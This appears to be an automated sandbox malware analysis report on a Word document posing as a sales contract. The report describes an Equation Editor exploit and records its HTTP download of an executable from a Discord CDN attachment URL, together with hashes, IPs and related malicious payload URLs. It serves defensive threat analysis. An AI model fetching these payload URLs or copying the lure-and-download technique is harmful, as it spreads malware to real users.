Loading ...

Play interactive tourEdit tour

Analysis Report Sales-contract-deaho-180521-poweruae.doc

Overview

General Information

Sample Name:Sales-contract-deaho-180521-poweruae.doc
Analysis ID:417106
MD5:e8453860de1826d58e0f5de9e04f11ea
SHA1:ac2e4b588051a6ba7bcef104e7027f9ce1036b14
SHA256:d18da684313ab3fe2b403fca933096ce347b800ef94b5a71dfc8e3a607f95dcd
Tags:doc
Infos:

Most interesting Screenshot:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2500 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 1552 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

Exploits:

barindex
Sigma detected: EQNEDT32.EXE connecting to internetShow sources
Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 162.159.135.233, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1552, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
Sigma detected: File Dropped By EQNEDT32EXEShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1552, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\poiu[1].exe

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: Sales-contract-deaho-180521-poweruae.docReversingLabs: Detection: 27%

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: unknownJump to behavior
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.22:49166 version: TLS 1.2
Source: global trafficDNS query: name: cdn.discordapp.com
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 162.159.135.233:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 162.159.135.233:80
Source: Joe Sandbox ViewIP Address: 162.159.135.233 162.159.135.233
Source: Joe Sandbox ViewIP Address: 162.159.135.233 162.159.135.233
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: global trafficHTTP traffic detected: GET /attachments/843685789120331799/844316591284944986/poiu.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: cdn.discordapp.comConnection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{78444D3B-DE8E-4300-98F0-AE5841A8170E}.tmpJump to behavior
Source: global trafficHTTP traffic detected: GET /attachments/843685789120331799/844316591284944986/poiu.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: cdn.discordapp.comConnection: Keep-Alive
Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.22:49166 version: TLS 1.2
Source: classification engineClassification label: mal68.expl.winDOC@3/8@2/1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$les-contract-deaho-180521-poweruae.docJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRBBC0.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Sales-contract-deaho-180521-poweruae.docReversingLabs: Detection: 27%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1276Thread sleep time: -60000s >= -30000sJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsExploitation for Client Execution13Path InterceptionProcess Injection1Masquerading1OS Credential DumpingVirtualization/Sandbox Evasion1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol13Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer2SIM Card SwapCarrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Sales-contract-deaho-180521-poweruae.doc28%ReversingLabsDocument-RTF.Exploit.Heuristic

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
cdn.discordapp.com
162.159.134.233
truefalse
    high

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://cdn.discordapp.com/attachments/843685789120331799/844316591284944986/poiu.exefalse
      high

      Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public

      IPDomainCountryFlagASNASN NameMalicious
      162.159.135.233
      unknownUnited States
      13335CLOUDFLARENETUStrue

      General Information

      Joe Sandbox Version:32.0.0 Black Diamond
      Analysis ID:417106
      Start date:19.05.2021
      Start time:10:37:15
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 4m 22s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:Sales-contract-deaho-180521-poweruae.doc
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:4
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal68.expl.winDOC@3/8@2/1
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .doc
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      Warnings:
      Show All
      • Exclude process from analysis (whitelisted): dllhost.exe
      • Report size getting too big, too many NtQueryAttributesFile calls found.
      • VT rate limit hit for: /opt/package/joesandbox/database/analysis/417106/sample/Sales-contract-deaho-180521-poweruae.doc

      Simulations

      Behavior and APIs

      TimeTypeDescription
      10:37:34API Interceptor32x Sleep call for process: EQNEDT32.EXE modified

      Joe Sandbox View / Context

      IPs

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      162.159.135.233PURCHASE ORDER E3007921.EXEGet hashmaliciousBrowse
      • cdn.discordapp.com/attachments/809311531652087809/839820005927550996/Youngest_Snake.exe
      Waybill Document 22700456.exeGet hashmaliciousBrowse
      • cdn.discordapp.com/attachments/809311531652087809/839856358152208434/May_Blessing.exe
      COMPANY REQUIREMENT.docGet hashmaliciousBrowse
      • cdn.discordapp.com/attachments/819674896988242004/819677189900861500/harcout.exe
      Email data form.docGet hashmaliciousBrowse
      • cdn.discordapp.com/attachments/789279517516365865/789279697203757066/angelx.scr
      Down Payment.docGet hashmaliciousBrowse
      • cdn.discordapp.com/attachments/788946375533789214/788947376849027092/atlasx.scr
      Vessel details.docGet hashmaliciousBrowse
      • cdn.discordapp.com/attachments/780175015496777751/781048233136226304/mocux.exe
      Teklif Rusya 24 09 2020.docGet hashmaliciousBrowse
      • cdn.discordapp.com/attachments/733818080668680222/758418625429372978/p2.jpg

      Domains

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      cdn.discordapp.com7HxYmHt2Lv.exeGet hashmaliciousBrowse
      • 162.159.130.233
      New_Order_May_2021.exeGet hashmaliciousBrowse
      • 162.159.130.233
      SecuriteInfo.com.Trojan.Win32.Save.a.25772.exeGet hashmaliciousBrowse
      • 162.159.135.233
      Nepodmireni racuni.exeGet hashmaliciousBrowse
      • 162.159.130.233
      I shquar Fature.exeGet hashmaliciousBrowse
      • 162.159.135.233
      tails1.exeGet hashmaliciousBrowse
      • 162.159.130.233
      MACHINE QUOTATION.exeGet hashmaliciousBrowse
      • 162.159.130.233
      WAnYq4Yh0Z.exeGet hashmaliciousBrowse
      • 162.159.130.233
      trinitymediaorder-po140521.docGet hashmaliciousBrowse
      • 162.159.135.233
      Uc18q04nYe.exeGet hashmaliciousBrowse
      • 162.159.134.233
      P748jZ2XlY.exeGet hashmaliciousBrowse
      • 162.159.133.233
      uAC5ja2ZtD.exeGet hashmaliciousBrowse
      • 162.159.135.233
      ehbLUKWH81.exeGet hashmaliciousBrowse
      • 162.159.134.233
      L3T91myq6o.exeGet hashmaliciousBrowse
      • 162.159.129.233
      Xu6PQZsM3f.exeGet hashmaliciousBrowse
      • 162.159.129.233
      DHL_445612.exeGet hashmaliciousBrowse
      • 162.159.134.233
      DHL_445612.exeGet hashmaliciousBrowse
      • 162.159.129.233
      DHL_45678.exeGet hashmaliciousBrowse
      • 162.159.129.233
      DHL_45678.exeGet hashmaliciousBrowse
      • 162.159.129.233
      x86_x64_setup.exeGet hashmaliciousBrowse
      • 162.159.133.233

      ASN

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      CLOUDFLARENETUSMEDEL09435#INVDIAGNOEQUIP.pdf.exeGet hashmaliciousBrowse
      • 104.21.19.200
      Ydomibnfzakfagtujeyntncjklfpfrinlj_Signed_.exeGet hashmaliciousBrowse
      • 104.21.64.13
      Payment Cert.8955-03 WIRE DOC.exeGet hashmaliciousBrowse
      • 172.67.143.218
      070FT0624190001.exeGet hashmaliciousBrowse
      • 172.67.198.158
      order.exeGet hashmaliciousBrowse
      • 104.21.19.200
      YnuiQ0mSnTIB95k.exeGet hashmaliciousBrowse
      • 104.21.19.200
      FileZilla_3.54.1_win64_sponsored-setup.exeGet hashmaliciousBrowse
      • 104.18.88.101
      SecuriteInfo.com.Trojan.Packed2.43117.26883.exeGet hashmaliciousBrowse
      • 104.21.23.37
      7HxYmHt2Lv.exeGet hashmaliciousBrowse
      • 162.159.130.233
      - FAX ID 93372012222222.htmGet hashmaliciousBrowse
      • 104.16.18.94
      9fea9a69_by_Libranalysis.dllGet hashmaliciousBrowse
      • 104.20.185.68
      t1Zvr4oI5o.dllGet hashmaliciousBrowse
      • 104.20.185.68
      9fea9a69_by_Libranalysis.dllGet hashmaliciousBrowse
      • 104.20.184.68
      t1Zvr4oI5o.dllGet hashmaliciousBrowse
      • 104.20.185.68
      ledger-live-crypto-wallet.apkGet hashmaliciousBrowse
      • 172.67.29.206
      #U260eNEW_FAX_MESSAGE_3959917508..htmlGet hashmaliciousBrowse
      • 172.67.150.89
      New Order_PO 1164_HD-F 4020 6K0521.exeGet hashmaliciousBrowse
      • 172.67.219.234
      Stolen Images Evidence.jsGet hashmaliciousBrowse
      • 172.67.207.146
      ps_script.ps1Get hashmaliciousBrowse
      • 172.67.223.27
      FileZilla_3.54.1_win64_sponsored-setup.exeGet hashmaliciousBrowse
      • 104.18.87.101

      JA3 Fingerprints

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      7dcce5b76c8b17472d024758970a406bdiagram-42009649.xlsGet hashmaliciousBrowse
      • 162.159.135.233
      diagram-2054770080.xlsGet hashmaliciousBrowse
      • 162.159.135.233
      diagram-1698815848.xlsGet hashmaliciousBrowse
      • 162.159.135.233
      diagram-2107205359.xlsGet hashmaliciousBrowse
      • 162.159.135.233
      diagram-1439249772.xlsGet hashmaliciousBrowse
      • 162.159.135.233
      Sales_Receipt 2399.xlsGet hashmaliciousBrowse
      • 162.159.135.233
      catalog-458980479.xlsGet hashmaliciousBrowse
      • 162.159.135.233
      Inv_366963.xlsbGet hashmaliciousBrowse
      • 162.159.135.233
      RDPWInst-v1.6.2.msiGet hashmaliciousBrowse
      • 162.159.135.233
      statistic-996882455.xlsGet hashmaliciousBrowse
      • 162.159.135.233
      statistic-921998505.xlsGet hashmaliciousBrowse
      • 162.159.135.233
      statistic-106209761.xlsGet hashmaliciousBrowse
      • 162.159.135.233
      statistic-1020816749.xlsGet hashmaliciousBrowse
      • 162.159.135.233
      statistic-94636249.xlsGet hashmaliciousBrowse
      • 162.159.135.233
      statistic-90184723.xlsGet hashmaliciousBrowse
      • 162.159.135.233
      statistic-1075287660.xlsGet hashmaliciousBrowse
      • 162.159.135.233
      diagram-1552325259.xlsGet hashmaliciousBrowse
      • 162.159.135.233
      VertiPaq Analyzer 2.02.xlsmGet hashmaliciousBrowse
      • 162.159.135.233
      698281_05172021.xlsGet hashmaliciousBrowse
      • 162.159.135.233
      trinitymediaorder-po140521.docGet hashmaliciousBrowse
      • 162.159.135.233

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\poiu[1].exe
      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):5
      Entropy (8bit):1.5219280948873621
      Encrypted:false
      SSDEEP:3:hn:h
      MD5:FDA44910DEB1A460BE4AC5D56D61D837
      SHA1:F6D0C643351580307B2EAA6A7560E76965496BC7
      SHA-256:933B971C6388D594A23FA1559825DB5BEC8ADE2DB1240AA8FC9D0C684949E8C9
      SHA-512:57DDA9AA7C29F960CD7948A4E4567844D3289FA729E9E388E7F4EDCBDF16BF6A94536598B4F9FF8942849F1F96BD3C00BC24A75E748A36FBF2A145F63BF904C1
      Malicious:true
      Reputation:high, very likely benign file
      Preview: 0....
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{78444D3B-DE8E-4300-98F0-AE5841A8170E}.tmp
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):1024
      Entropy (8bit):0.05390218305374581
      Encrypted:false
      SSDEEP:3:ol3lYdn:4Wn
      MD5:5D4D94EE7E06BBB0AF9584119797B23A
      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
      Malicious:false
      Reputation:high, very likely benign file
      Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9A867ADF-3614-4635-BF44-6C9AC8D8FC42}.tmp
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):1536
      Entropy (8bit):1.5235358623136555
      Encrypted:false
      SSDEEP:6:S4Ov5w8toOgP5qlmujjHWYqK/Cd6cofoFNgREqAWlgFJg/jlll8vlw2FrA:S4OvN4q3isKd6cofmk5uFJgbuvq2ZA
      MD5:6EE82E9A59AE1FF005DC609E4ADA4229
      SHA1:0565246E07B840A749A00F6647E5B144CB8D97B3
      SHA-256:59F1287A250271F75B5B9BEED5CE876B09BD51E5385F32786AFC93F66C4AD8E5
      SHA-512:2693922ED15968B0C753A7B8E9461D566B6B1C7DCF05D33A27E9CE428D5483BC79013FD3EEEA4993DFEEE1A4416D9FE35A83351161EEB7DEB35F1182CF97E87C
      Malicious:false
      Reputation:low
      Preview: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .7.4.0.5.3.3.3.2. . . . . . . . . . . . . ._. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .O.n.l.H.d.K.f.J.b.Q.W.V.u.A.f.F.Q.d.M.1._.o.o.2.r.Q.L.c.p.f.Q.C.r.M.B.f.R.s.0.C.5.V.i.f.C.q.y.K.7.e.5.e.U.q.r.U.n.l.r.S.D.g.p.c.h.Y.R.J.I.4.D.I.i.t.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.8.9.4.0.4.8.5.2.4.8.9.4.0.4.8.5.2.=....... .E.q.u.a.t.i.o.n...3.E.M.B.E.D.................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Sales-contract-deaho-180521-poweruae.LNK
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Wed Aug 26 14:08:14 2020, atime=Wed May 19 16:37:32 2021, length=4776, window=hide
      Category:dropped
      Size (bytes):2288
      Entropy (8bit):4.550392227403443
      Encrypted:false
      SSDEEP:48:8x/XT3IFUEgUmgwKQh2x/XT3IFUEgUmgwKQ/:8x/XLIFUr2wKQh2x/XLIFUr2wKQ/
      MD5:241C7125A0885F44F08D067D2B905B9D
      SHA1:BA561B11AE45A8B66C400FE8410D00404B1607F6
      SHA-256:637DD93D60D7CAAA45FDA037DF6E0E1C551FE7CC219C7C803CBE5FCA8C2F9D83
      SHA-512:FD17BCBC3C04498782757BEB3142DBE87BFC28732438B7796A77DC7D8BBE4E0B77866FA3CC1F27F62F0DAA55B0B8B7B12DBB29F53E6419CDE92C37757A350B9F
      Malicious:false
      Reputation:low
